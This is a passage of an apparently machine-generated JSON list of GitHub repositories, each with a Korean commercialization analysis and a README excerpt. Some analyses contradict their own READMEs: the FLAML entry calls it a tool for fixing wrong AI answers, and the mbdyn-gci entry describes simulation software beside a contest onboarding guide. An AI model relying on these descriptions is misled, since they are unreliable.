Opt","composite_score":0.1352,"license_safety_tag":"restricted"},{"name":"yahoo/pure","github_url":"https://github.com/yahoo/pure","stars":6,"language":"JavaScript","license":"NOASSERTION","abandonment_months":3,"description":"# yahoo/pure 프로젝트 분석\n\n## 왜 보물인가\nYahoo의 공식 저장소로, 웹 개발에서 자주 쓰이는 기본 디자인 도구를 무료로 제공하기 때문에 많은 개발자들이 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹사이트 빌더 플랫폼에서 사용자들이 빠르게 페이지를 꾸밀 수 있는 기본 템플릿으로 제공\n2. **내부 업무 도","readme_excerpt":"# Pure\n\n[![Pure](https://cloud.githubusercontent.com/assets/449779/5291099/1b554cca-7b03-11e4-9157-53a12d91b34a.png)][pure]\n\nA set of small, responsive CSS modules that you can use in every web project.\n[https://purecss.io/][pure]\n\n![Build Status](https://github.com/pure-css/pure/actions/workflows/test.yml/badge.svg)\n\n## Features\n\nPure is a starting point for every website or web app. We take care\nof all the CSS work that every site needs without making it look cookie-cutter:\n\n- A responsive grid that can be customized to your needs.\n\n- A solid base built on [Normalize.css][] to fix cross-browser compatibility\n  issues.\n\n- Consistently styled buttons that work with `<a>` and `<button>` elements.\n\n- Styles for vertical and horizontal menus, including support for dropdown\n  menus.\n\n- Useful form alignments that look great on all screen sizes.\n\n- Various common table styles.\n\n- An extremely minimalist look that is super-easy to customize.\n\n- Responsive by default, with a non-responsive op","composite_score":0.1351,"license_safety_tag":"unknown"},{"name":"Shopify/toxiproxy","github_url":"https://github.com/Shopify/toxiproxy","stars":5,"language":"Go","license":"mit","abandonment_months":0,"description":"# Shopify/toxiproxy 분석 보고서\n\n## 왜 보물인가\n인터넷 서비스의 문제 상황을 안전하게 테스트할 수 있는 도구로, 서비스 안정성을 미리 확인하고 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **금융 앱/핀테크 SaaS**: 송금 실패, 네트워크 끊김 상황에서도 고객 자산이 안전한지 검증하는 데 사용\n2. **의료 정보 시스템**","readme_excerpt":"# Toxiproxy\n[![GitHub release](https://img.shields.io/github/release/Shopify/toxiproxy.svg)](https://github.com/Shopify/toxiproxy/releases/latest)\n[![Build Status](https://github.com/Shopify/toxiproxy/actions/workflows/test.yml/badge.svg)](https://github.com/Shopify/toxiproxy/actions/workflows/test.yml)\n\n![](http://i.imgur.com/sOaNw0o.png)\n\nToxiproxy is a framework for simulating network conditions. It's made\nspecifically to work in testing, CI and development environments, supporting\ndeterministic tampering with connections, but with support for randomized chaos\nand customization. **Toxiproxy is the tool you need to prove with tests that\nyour application doesn't have single points of failure.** We've been\nsuccessfully using it in all development and test environments at Shopify since\nOctober, 2014. See our [blog post][blog] on resiliency for more information.\n\nToxiproxy usage consists of two parts. A TCP proxy written in Go (what this\nrepository contains) and a client communicating wi","composite_score":0.135,"license_safety_tag":"safe"},{"name":"elasticjob/elastic-job","github_url":"https://github.com/elasticjob/elastic-job","stars":8,"language":"Java","license":"apache-2.0","abandonment_months":1,"description":"# Elastic Job 상용화 분석\n\n## 왜 보물인가\n반복적으로 실행되어야 하는 작업들을 자동으로 관리해주는 시스템으로, 많은 회사들이 필요로 하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독 관리 시스템에서 매월 자동으로 고객 요금을 청구하고 갱신하는 자동화 플랫폼\n2. **내부 업무 도구**: 대기업 백오피스에서","readme_excerpt":"# [ElasticJob - Distributed scheduled job](http://shardingsphere.apache.org/elasticjob/)\n\n**Official website: https://shardingsphere.apache.org/elasticjob/**\n\n[![Stargazers over time](https://starchart.cc/apache/shardingsphere-elasticjob.svg)](https://starchart.cc/apache/shardingsphere-elasticjob)\n\nThrough the functions of flexible scheduling, resource management and job management, \nit creates a distributed scheduling solution suitable for Internet scenarios, \nand provides a diversified job ecosystem through open architecture design.\nIt uses a unified job API for each project.\nDevelopers only need code one time and can deploy at will.\n\nElasticJob became an [Apache ShardingSphere](https://shardingsphere.apache.org/) Sub-project on May 28 2020.\n\nYou are welcome to communicate with the community via the [mailing list](mailto:dev@shardingsphere.apache.org).\n\n[![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html)\n\n[![GitHu","composite_score":0.1349,"license_safety_tag":"safe"},{"name":"reactjs/react-redux","github_url":"https://github.com/reactjs/react-redux","stars":14,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# React-Redux 저장소 분석\n\n## 왜 보물인가\n웹사이트의 복잡한 데이터를 효율적으로 관리하는 '뇌' 역할을 하는 오픈소스 도구로, 전 세계 개발자들이 신뢰하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 대시보드형 프로젝트 관리 툴(Asana, Notion 같은)의 복잡한 사용자 데이터 관리\n- **내부 업무 도구**","readme_excerpt":"# React Redux\n\nOfficial React bindings for [Redux](https://github.com/reduxjs/redux).\nPerformant and flexible.\n\n![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/reduxjs/react-redux/test.yml?style=flat-square) [![npm version](https://img.shields.io/npm/v/react-redux.svg?style=flat-square)](https://www.npmjs.com/package/react-redux)\n[![npm downloads](https://img.shields.io/npm/dm/react-redux.svg?style=flat-square)](https://www.npmjs.com/package/react-redux)\n[![#redux channel on Discord](https://img.shields.io/badge/discord-redux@reactiflux-61DAFB.svg?style=flat-square)](http://www.reactiflux.com)\n\n## Installation\n\n### Create a React Redux App\n\nThe recommended way to start new apps with React and Redux is by using [our official Redux+TS template for Vite](https://github.com/reduxjs/redux-templates), or by creating a new Next.js project using [Next's `with-redux` template](https://github.com/vercel/next.js/tree/canary/examples/with-redux).\n\nBoth of these alre","composite_score":0.1346,"license_safety_tag":"safe"},{"name":"probml/pml-book","github_url":"https://github.com/probml/pml-book","stars":32,"language":"Jupyter Notebook","license":"MIT","abandonment_months":6,"description":"# probml/pml-book 저장소 분석\n\n## 왜 보물인가\n기계학습 개념을 그림과 예제로 설명하는 무료 교과서로, 복잡한 AI 기술을 누구나 이해할 수 있게 만든 귀중한 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼 SaaS**: 코드카데미, 유다시티 같은 학습 서비스에서 기계학습 강좌 커리큘럼의 기초 교재로 제공\n2. *","readme_excerpt":"\n# \"Probabilistic machine learning\": a book series by Kevin Murphy\n\n\n  <p>&nbsp;</p>\n  \n## Book 0: \"Machine Learning: A Probabilistic Perspective\" (2012)\n\nSee [this link](https://probml.github.io/pml-book/book0.html)\n\n<!--\nSee [this link](https://probml.github.io/pml-book/pml0/book0.html)\n-->\n\n## Book 1: \"Probabilistic Machine Learning: An Introduction\" (2022)\n\nSee [this link](https://probml.github.io/pml-book/book1.html)\n\n\n## Book 2: \"Probabilistic Machine Learning: Advanced Topics\" (2023)\n\nSee [this link](https://probml.github.io/pml-book/book2.html)\n\n\n\n","composite_score":0.1342,"license_safety_tag":"safe"},{"name":"microsoft/FLAML","github_url":"https://github.com/microsoft/FLAML","stars":9,"language":"Jupyter Notebook","license":"MIT","abandonment_months":0,"description":"# FLAML 상용화 분석 보고서\n\n## 왜 보물인가\n인공지능이 잘못된 답변을 하는 문제를 자동으로 찾아내고 고치는 기술로, AI 신뢰성이 중요한 모든 기업에서 필수적으로 필요합니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 챗봇 서비스 (SaaS)**\n고객 상담, 의료 상담, 법률 자문 챗봇이 잘못된 정보를 제공하지 않도록 자동 검증하는 기능을 월 구독","readme_excerpt":"[![PyPI version](https://badge.fury.io/py/FLAML.svg)](https://badge.fury.io/py/FLAML)\n![Conda version](https://img.shields.io/conda/vn/conda-forge/flaml)\n[![Build](https://github.com/microsoft/FLAML/actions/workflows/python-package.yml/badge.svg)](https://github.com/microsoft/FLAML/actions/workflows/python-package.yml)\n[![PyPI - Python Version](https://img.shields.io/pypi/pyversions/FLAML)](https://pypi.org/project/FLAML/)\n[![Downloads](https://pepy.tech/badge/flaml)](https://pepy.tech/project/flaml)\n[![](https://img.shields.io/discord/1025786666260111483?logo=discord&style=flat)](https://discord.gg/Cppx2vSPVP)\n\n<!-- [![Join the chat at https://gitter.im/FLAMLer/community](https://badges.gitter.im/FLAMLer/community.svg)](https://gitter.im/FLAMLer/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) -->\n\n# A Fast Library for Automated Machine Learning & Tuning\n\n<p align=\"center\">\n    <img src=\"https://github.com/microsoft/FLAML/blob/main/website/static/im","composite_score":0.134,"license_safety_tag":"safe"},{"name":"MindorksOpenSource/android-interview-questions","github_url":"https://github.com/MindorksOpenSource/android-interview-questions","stars":9,"language":"Java","license":"apache-2.0","abandonment_months":2,"description":"# Android Interview Questions 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자 채용 면접에 필요한 핵심 질문들을 체계적으로 정리해둔 자료로, 기업의 채용 비용과 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **인재 채용 플랫폼**: IT 기업의 신입 개발자 면접 질문 데이터베이스로 제공하여 채용 효율성 향상\n","readme_excerpt":"<p align=\"center\">\n    <img alt=\"Android Interview Questions\" src=\"https://raw.githubusercontent.com/amitshekhariitbhu/android-interview-questions/master/assets/banner-android-interview-questions.jpg\">\n</p>\n\n# Android Interview Questions and Answers\n\n> Android Interview Questions and Answers - Your Cheat Sheet For Android Interview\n\n### Prepared and maintained by the **Founder** of [Outcome School](https://outcomeschool.com): Amit Shekhar\n\n## About me\n\nHi, I am Amit Shekhar, Founder @ [Outcome School](https://outcomeschool.com) • IIT 2010-14 • I have taught and mentored many developers, and their efforts landed them high-paying tech jobs, helped many tech companies in solving their unique problems, and created many open-source libraries being used by top companies. I am passionate about sharing knowledge through open-source, blogs, and videos.\n\nYou can connect with me on:\n\n- [X/Twitter](https://x.com/amitiitbhu)\n- [YouTube](https://www.youtube.com/@amitshekhar)\n- [LinkedIn](https://www","composite_score":0.1339,"license_safety_tag":"safe"},{"name":"smartloli/kafka-eagle","github_url":"https://github.com/smartloli/kafka-eagle","stars":19,"language":"Java","license":"apache-2.0","abandonment_months":5,"description":"# Kafka Eagle 상용화 분석\n\n## 왜 보물인가\n메시지 전송 시스템(카프카)의 상태를 한눈에 모니터링하고 관리할 수 있는 대시보드로, 기업의 데이터 흐름을 안정적으로 유지하는 데 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 카프카 모니터링 클라우드 플랫폼**\n- 기업이 구축한 카프카 시스템의 상태를 웹에서 실시간 감","readme_excerpt":"# EFAK-AI (Eagle For Apache Kafka - AI Enhanced)\n\n[![Version](https://img.shields.io/badge/version-5.0.0-blue.svg)](https://github.com/smartloli/EFAK)\n[![Java](https://img.shields.io/badge/Java-17-orange.svg)](https://openjdk.java.net/projects/jdk/17/)\n[![Spring Boot](https://img.shields.io/badge/Spring%20Boot-3.4.5-green.svg)](https://spring.io/projects/spring-boot)\n[![License](https://img.shields.io/badge/license-Apache%202.0-blue.svg)](LICENSE)\n\n[![Stargazers over time](https://starchart.cc/smartloli/EFAK.svg?variant=adaptive)](https://starchart.cc/smartloli/EFAK)\n\n## 项目简介\n\n**EFAK-AI (Eagle For Apache Kafka - AI)** 是一款开源的 Kafka 智能监控与管理平台，融合了人工智能技术，为 Kafka 运维提供智能化、可视化、自动化的全方位解决方案。\n\n### 🎯 核心优势\n\n- **🧠 AI 驱动**: 集成主流大语言模型（OpenAI、Claude、DeepSeek 等），提供智能对话式运维\n- **📊 实时监控**: 全方位监控 Kafka 集群健康状态、性能指标、消费延迟等关键数据\n- **🚀 高性能**: 基于 Spring Boot 3.x 和 JDK 17，采用响应式编程和异步处理\n- **🔧 易部署**: 支持 Docker 一键部署和传统 tar.gz 安装包两种方式\n\n## 核心特性\n\n### 🤖 AI 智能助手\n- **多模型支持**: 集成 OpenAI、Claude、DeepSeek 等多种大语言模型\n- **Function C","composite_score":0.1339,"license_safety_tag":"safe"},{"name":"botui/botui","github_url":"https://github.com/botui/botui","stars":6,"language":"TypeScript","license":"mit","abandonment_months":10,"description":"# BotUI 프로젝트 분석\n\n## 왜 보물인가\n누구나 쉽게 챗봇 인터페이스를 만들 수 있는 가벼운 도구로, 복잡한 기술 없이도 대화형 웹서비스를 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 쇼핑몰이 챗봇 기반 고객상담 플랫폼을 구독형으로 제공\n2. **내부 업무 도구**: 기업 HR팀이 직원 채용 면접 자동화 챗봇을","readme_excerpt":"![logo](packages/botui/assets/logo.svg)\n\n[![join discussion](https://img.shields.io/badge/discussions-🤝-blueviolet?style=flat-square)](https://github.com/botui/botui/discussions) [![npm](https://img.shields.io/npm/v/botui.svg?style=flat-square)](https://www.npmjs.com/package/botui) [![npm](https://img.shields.io/npm/dm/botui.svg?style=flat-square)](https://www.npmjs.com/package/botui) [![Twitter Follow](https://img.shields.io/twitter/follow/moinism)](https://twitter.com/moinism)\n\n> A JavaScript framework for creating conversational UIs.\n\n\n[Main Site](https://botui.org) - [Read Docs](https://docs.botui.org) - [Examples](https://github.com/moinism/botui-examples) - [🪄 Quickstart](https://github.com/botui/react-quickstart)\n\n## Showcase 🎇✨\n\nWe are listing all the cool projects that people are building with BotUI, [here](https://github.com/botui/botui/blob/master/Showcase.md). See others' and add yours!\n\n### Quick look\n\n![preview](packages/botui/assets/botui_preview.gif)\n\n## Installation\n\n`","composite_score":0.1333,"license_safety_tag":"safe"},{"name":"microsoft/recommenders","github_url":"https://github.com/microsoft/recommenders","stars":6,"language":"Python","license":"MIT","abandonment_months":0,"description":"# Microsoft Recommenders 저장소 분석\n\n## 왜 보물인가\nNetflix, Amazon 같은 서비스에서 \"당신을 위한 추천\" 기능을 만드는 검증된 기술을 Microsoft가 무료로 공개한 것입니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 SaaS**: 온라인 쇼핑몰에 \"추천 상품\" 기능을 탑재하는 서비스로 판매\n2. **영상 스트리","readme_excerpt":"<!--\nCopyright (c) Recommenders contributors.\nLicensed under the MIT License.\n-->\n<img src=\"https://raw.githubusercontent.com/recommenders-team/artwork/main/color/recommenders_color.svg\" width=\"800\">\n\n\n[![Documentation status](https://github.com/recommenders-team/recommenders/actions/workflows/pages/pages-build-deployment/badge.svg)](https://github.com/recommenders-team/recommenders/actions/workflows/pages/pages-build-deployment)\n[![License](https://img.shields.io/github/license/recommenders-team/recommenders.svg)](https://github.com/recommenders-team/recommenders/blob/main/LICENSE)\n[![Black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n[![PyPI Version](https://img.shields.io/pypi/v/recommenders.svg?logo=pypi&logoColor=white)](https://pypi.org/project/recommenders)\n[![Python Versions](https://img.shields.io/pypi/pyversions/recommenders.svg?logo=python&logoColor=white)](https://pypi.org/project/recommenders)\n\n[<img align=\"left\" width=\"300\" s","composite_score":0.133,"license_safety_tag":"safe"},{"name":"kensanata/mastodon-backup","github_url":"https://github.com/kensanata/mastodon-backup","stars":5,"language":"Python","license":"GPL-3.0","abandonment_months":3,"description":"# mastodon-backup 사업화 분석\n\n## 왜 보물인가\n마스토돈(분산형 SNS) 사용자들이 자신의 게시물과 데이터를 안전하게 보관할 수 있는 간단한 백업 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: \"내 마스토돈 계정 자동 백업\" 구독 서비스로, 사용자가 매월 정기적으로 데이터를 클라우드에 저장하는 서비스\n2. **내부 업","readme_excerpt":"# Mastodon Archive\n\nThis tool enables you to make an archive of your statuses, your\nfavourites, bookmarks and the media in both your statuses, your\nfavourites and your bookmarks. From this archive, you can generate a\nsimple text file, or a HTML file with or without media. Take a look at\nan\n[example](https://alexschroeder.ch/mastodon.weaponvsac.space.user.kensanata.html)\nif you're curious.\n\nNote that Mastodon\n[v2.3.0](https://github.com/tootsuite/mastodon/releases/tag/v2.3.0)\nadded an account archive download feature: \"Every 7 days you are able\nto request a full archive of your toots. The toots are exported in\nActivityPub JSON format alongside the media files attached to them,\nyour avatar and header images as well as the private key of your\naccount used for signing content.\" If all you want to do is have a\nbackup of your data, perhaps that is enough and you don't need this\ntool. Use something like\n[Toot-suite](https://codeberg.org/chrmoe/toot-suite) for Emacs,\n[Mastodon Archive Reader L","composite_score":0.1329,"license_safety_tag":"restricted"},{"name":"matteocrippa/awesome-swift","github_url":"https://github.com/matteocrippa/awesome-swift","stars":5,"language":"Ruby","license":"cc0-1.0","abandonment_months":1,"description":"# Awesome Swift 저장소 분석\n\n## 왜 보물인가\n아이폰 앱 만드는 데 필요한 좋은 도구와 자료들을 한곳에 모아놓은 가이드북으로, 개발자들의 시간을 크게 절약해줍니다.\n\n## 어디에 쓸 수 있나\n1. **아이폰 앱 개발사 SaaS**: 이 목록을 기반으로 개발자 교육 플랫폼을 만들어 월 구독으로 판매\n2. **기업 개발팀 내부 도구**: 회사의 ","readme_excerpt":"# Awesome Swift\n \n<!-- \n\nPLEASE DO NOT UPDATE THIS FILE, UPDATE CONTENTS.JSON INSTEAD. THANK YOU :-)\n\n -->\n\n\n\n| Awesome | Linux | Projects | Updated |\n|:-------:|:-----:|:--------:|:-------:|\n| [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) | :penguin: | 1100 | May 05, 2026 |\n\nIn parternship with:\n\n[![Codemotion](https://github.com/matteocrippa/awesome-swift/blob/master/.github/images/codemotion_logo.png?raw=true)](https://codemo.tech/partners)\n\n\n\n### Contents\n\n- [Guides](#guides)\n  - [Newsletter](#newsletter)\n  - [Official Guides](#official-guides)\n  - [Style Guides](#style-guides)\n  - [Third party Guides](#third-party-guides)\n- [Boilerplates](#boilerplates)\n- [REPL](#repl)\n- [Editor Support](#editor-support)\n  - [Emacs](#emacs)\n  - [Google Colaboratory](#google-colaboratory)\n  - [Vim](#vim)\n- [Benchmark](#benchmark)\n- [Converters](#converters)\n- [Other Awesome Lists](#other-aw","composite_score":0.1326,"license_safety_tag":"unknown"},{"name":"render-examples/fastai-v3","github_url":"https://github.com/render-examples/fastai-v3","stars":222,"language":"Python","license":"NOASSERTION","abandonment_months":3,"description":"","readme_excerpt":"","composite_score":0.1326,"license_safety_tag":"unknown"},{"name":"Bo0oM/fuzz.txt","github_url":"https://github.com/Bo0oM/fuzz.txt","stars":84,"language":"","license":"WTFPL","abandonment_months":9,"description":"# Bo0oM/fuzz.txt 분석\n\n## 왜 보물인가\n보안 취약점을 찾기 위한 테스트 데이터 모음으로, 보안 업체와 개발자들이 자신의 시스템이 얼마나 안전한지 확인하는 데 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 보안 진단 서비스**: 기업 고객의 애플리케이션 취약점을 자동으로 검사해주는 구독형 서비스로 운영\n- **API 판매**: 보안팀","readme_excerpt":"# fuzz.txt\n\nThere's Nothing so Permanent as Temporary\n\n[Any ideas?](https://github.com/Bo0oM/fuzz.txt/issues/new)\n","composite_score":0.1322,"license_safety_tag":"safe"},{"name":"nayafia/lemonade-stand","github_url":"https://github.com/nayafia/lemonade-stand","stars":30,"language":"","license":"cc0-1.0","abandonment_months":10,"description":"# nayafia/lemonade-stand 분석 보고서\n\n## 왜 보물인가\n개인이나 소규모 팀이 온라인에서 간단하게 수익을 만들 수 있도록 돕는 실용적인 가이드이자 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **프리랜서 플랫폼**: 개발자나 디자이너가 자신의 기술을 작은 프로젝트로 쪼개어 빠르게 판매하는 마켓플레이스\n2. **소상공인 경영 도구**","readme_excerpt":"# A handy guide to financial support for open source.\n*\"I do open source work, how do I find funding?\"*\n\nThis document aims to provide an exhaustive list of all the ways that people get paid for open source work. Hopefully, projects and contributors will find this helpful in figuring out the best options for them.\n\nThe list below is roughly ordered from small to large. Each funding category links to several real examples (using topical articles or pages wherever possible instead of just a project's homepage.)\n\nThe categories are not mutually exclusive. For example, a project might have a foundation but also use crowdfunding to raise money. Someone else might do consulting and also have a donation button. Etc. \n\n\n---\n\n\n# Table of Contents\n1. [Donation button](#donation-button)\n2. [Bounties](#bounties)\n3. [Sponsorware](#sponsorware)\n4. [Crowdfunding (one-time)](#crowdfunding-one-time)\n5. [Crowdfunding (recurring)](#crowdfunding-recurring)\n6. [Books and merchandise](#books-and-merchandise","composite_score":0.132,"license_safety_tag":"unknown"},{"name":"Uniswap/v3-core","github_url":"https://github.com/Uniswap/v3-core","stars":10,"language":"TypeScript","license":"NOASSERTION","abandonment_months":1,"description":"# Uniswap/v3-core 분석 보고서\n\n## 왜 보물인가\n암호화폐 거래소의 핵심 기술을 담은 오픈소스로, 전 세계 수백만 명이 사용하는 탈중앙화 금융 인프라의 근간입니다.\n\n## 어디에 쓸 수 있나\n\n1. **암호화폐 거래 플랫폼 SaaS**: 이 코드를 기반으로 자신의 거래소 서비스를 만들어 고객에게 구독료로 판매\n2. **블록체인 분석 API 판","readme_excerpt":"# Uniswap V3\n\n[![Lint](https://github.com/Uniswap/uniswap-v3-core/actions/workflows/lint.yml/badge.svg)](https://github.com/Uniswap/uniswap-v3-core/actions/workflows/lint.yml)\n[![Tests](https://github.com/Uniswap/uniswap-v3-core/actions/workflows/tests.yml/badge.svg)](https://github.com/Uniswap/uniswap-v3-core/actions/workflows/tests.yml)\n[![Fuzz Testing](https://github.com/Uniswap/uniswap-v3-core/actions/workflows/fuzz-testing.yml/badge.svg)](https://github.com/Uniswap/uniswap-v3-core/actions/workflows/fuzz-testing.yml)\n[![Mythx](https://github.com/Uniswap/uniswap-v3-core/actions/workflows/mythx.yml/badge.svg)](https://github.com/Uniswap/uniswap-v3-core/actions/workflows/mythx.yml)\n[![npm version](https://img.shields.io/npm/v/@uniswap/v3-core/latest.svg)](https://www.npmjs.com/package/@uniswap/v3-core/v/latest)\n\nThis repository contains the core smart contracts for the Uniswap V3 Protocol.\nFor higher level contracts, see the [uniswap-v3-periphery](https://github.com/Uniswap/uniswap-v3","composite_score":0.1318,"license_safety_tag":"unknown"},{"name":"mrholek/CoreUI-Free-Bootstrap-Admin-Template","github_url":"https://github.com/mrholek/CoreUI-Free-Bootstrap-Admin-Template","stars":9,"language":"HTML","license":"mit","abandonment_months":1,"description":"# CoreUI 무료 부트스트랩 관리자 템플릿 분석\n\n## 왜 보물인가\n전문 디자이너 없이도 전문적인 관리자 화면을 빠르게 만들 수 있는 무료 기초 설계도입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회원사의 대시보드, 통계 화면, 설정 페이지를 이 템플릿으로 구축하고 구독료 청구\n2. **내부 업무 도구**: 중소기업의 직원 관리, 판","readme_excerpt":"# CoreUI Free Bootstrap Admin Template — Built for AI-Assisted Development [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social&logo=twitter)](https://twitter.com/intent/tweet?text=CoreUI%20-%20Free%20Bootstrap%204%20Admin%20Template%20&url=https://coreui.io&hashtags=bootstrap,admin,template,dashboard,panel,free,angular,react,vue)\n\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg?style=flat-square)](https://opensource.org/licenses/MIT)\n[![@coreui coreui](https://img.shields.io/badge/@coreui%20-coreui-lightgrey.svg?style=flat-square)](https://github.com/coreui/coreui)\n[![npm package][npm-coreui-badge]][npm-coreui]\n[![NPM downloads][npm-coreui-download]][npm-coreui]\n\n[npm-coreui]: https://www.npmjs.com/package/@coreui/coreui\n[npm-coreui-badge]: https://img.shields.io/npm/v/@coreui/coreui.png?style=flat-square\n[npm-coreui-download]: https://img.shields.io/npm/dm/@coreui/coreui.svg?style=flat-square\n\n[![Bootstrap Admin Template](https://assets.c","composite_score":0.1314,"license_safety_tag":"safe"},{"name":"JonnyBurger/remotion","github_url":"https://github.com/JonnyBurger/remotion","stars":24,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"# Remotion 저장소 분석\n\n## 왜 보물인가\n프로그래밍으로 동영상을 자동 생성할 수 있는 도구로, 유튜브 영상, 광고, 마케팅 콘텐츠를 손쉽게 대량 제작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 자동 영상 생성 웹사이트 - 사용자가 텍스트나 이미지를 업로드하면 완성된 동영상을 받음\n2. **내부 업무 도구**: 마케팅","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://github.com/remotion-dev/logo\">\n    <picture>\n      <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://github.com/remotion-dev/logo/raw/main/animated-logo-banner-dark.apng\">\n      <img alt=\"Animated Remotion Logo\" src=\"https://github.com/remotion-dev/logo/raw/main/animated-logo-banner-light.gif\">\n    </picture>\n  </a>\n</p>\n\n[![Discord Shield](https://img.shields.io/discord/809501355504959528?color=000000&label=Discord&logo=fdgssdf)](https://remotion.dev/discord)\n[![NPM Version](https://img.shields.io/npm/v/remotion.svg?style=flat&color=black)](https://www.npmjs.org/package/remotion)\n[![NPM Downloads](https://img.shields.io/npm/dm/remotion.svg?style=flat&color=black&label=Downloads)](https://npmcharts.com/compare/remotion?minimal=true)\n<a href=\"https://twitter.com/remotion\"><img src=\"https://img.shields.io/twitter/follow/remotion?label=Twitter&color=black\" alt=\"Twitter\"></a>\n\nRemotion is a framework for **creating videos programmatically us","composite_score":0.1314,"license_safety_tag":"unknown"},{"name":"fossasia/mbdyn-gci","github_url":"https://github.com/fossasia/mbdyn-gci","stars":12,"language":"","license":"GPL-2.0","abandonment_months":3,"description":"# fossasia/mbdyn-gci 분석\n\n## 왜 보물인가\n복잡한 기계 운동을 컴퓨터로 정확하게 계산해주는 오픈소스 엔지니어링 소프트웨어로, 항공우주·자동차·로봇 산업에서 실제 제품 설계에 필수적으로 사용됩니다.\n\n## 어디에 쓸 수 있나\n\n**1. 엔지니어링 SaaS 플랫폼**\n- 브라우저에서 기계 설계를 시뮬레이션하는 웹 서비스로 제공 (예: 헬리콥","readme_excerpt":"# Codeheat\n\nJoin us for the Codeheat contest at https://codeheat.org\n\n## Codeheat Contributor Onboarding Guide\n\nWelcome to **Codeheat**! This guide explains how to join the **FOSSASIA GitHub organization** and get added to the **Codeheat team**.\n\n### Step 1: Request to Join\n\n1. Open a new onboarding issue using this link:  \n   **[Join FOSSASIA and the Codeheat Team](https://github.com/fossasia/Codeheat/issues/new?template=join-codeheat.md)**\n2. Add a short introduction or reason for joining Codeheat.\n3. Submit the issue.\n\n> The issue will automatically receive the `org-invite` label.\n\n### Step 2: Automated Processing\n\nOnce the issue is labeled:\n- A GitHub Action will process your request\n- You’ll receive a comment showing your onboarding status:\n  - Organization membership status\n  - Codeheat team membership status\n\n**Typical processing time:** a few seconds to a minute.\n\n### Step 3: Accept the Invitation (If Required)\n\nIf your org membership status is **pending**:\n- Check your **GitHu","composite_score":0.1314,"license_safety_tag":"restricted"},{"name":"hybridgroup/gobot","github_url":"https://github.com/hybridgroup/gobot","stars":5,"language":"Go","license":"NOASSERTION","abandonment_months":5,"description":"# Gobot 저장소 분석 보고서\n\n## 왜 보물인가\n로봇과 IoT 기기를 쉽게 제어할 수 있는 프로그래밍 틀이 있어서, 로봇 관련 사업을 빠르게 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **로봇 관리 SaaS**: 드론, 청소로봇 등을 웹사이트에서 한번에 제어하는 구독형 서비스\n2. **공장 자동화 도구**: 제조업체가 자동화 기계를 모니터링","readme_excerpt":"[![Gobot](https://raw.githubusercontent.com/hybridgroup/gobot-site/master/source/images/elements/gobot-logo-small.png)](http://gobot.io/)\n\n[![GoDoc](https://godoc.org/gobot.io/x/gobot/v2?status.svg)](https://godoc.org/gobot.io/x/gobot/v2)\n[![CircleCI Build status](https://circleci.com/gh/hybridgroup/gobot/tree/dev.svg?style=svg)](https://circleci.com/gh/hybridgroup/gobot/tree/dev)\n[![Appveyor Build status](https://ci.appveyor.com/api/projects/status/ix29evnbdrhkr7ud/branch/dev?svg=true)](https://ci.appveyor.com/project/deadprogram/gobot/branch/dev)\n[![codecov](https://codecov.io/gh/hybridgroup/gobot/branch/dev/graph/badge.svg)](https://codecov.io/gh/hybridgroup/gobot)\n[![Go Report Card](https://goreportcard.com/badge/hybridgroup/gobot)](https://goreportcard.com/report/hybridgroup/gobot)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/hybridgroup/gobot/blob/release/LICENSE.txt)\n\nGobot (<https://gobot.io/>) is a framework using the Go programmi","composite_score":0.1309,"license_safety_tag":"unknown"},{"name":"victornpb/deleteDiscordMessages","github_url":"https://github.com/victornpb/deleteDiscordMessages","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":5,"description":"# deleteDiscordMessages 상용화 분석\n\n## 왜 보물인가\nDiscord에서 과거 메시지를 한 번에 지우고 싶은 수백만 명의 사용자들이 수동으로 하나씩 삭제하는 번거로움을 자동화로 해결해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: \"Discord 메시지 자동 정리\" 웹사이트 구독 서비스로, 사용자가 로그인 후 ","readme_excerpt":"# Undiscord - Delete all messages in a Discord channel or DM\n<!-- shields -->\n[![GitHub release (latest by date)](https://img.shields.io/github/v/release/victornpb/undiscord?color=%235865f2&display_name=tag&label=Undiscord&style=flat-square)][greasyfork_url]\n[![GitHub Release Date](https://img.shields.io/github/release-date/victornpb/undiscord?style=flat-square)](https://github.com/victornpb/undiscord/releases)\n[![GitHub 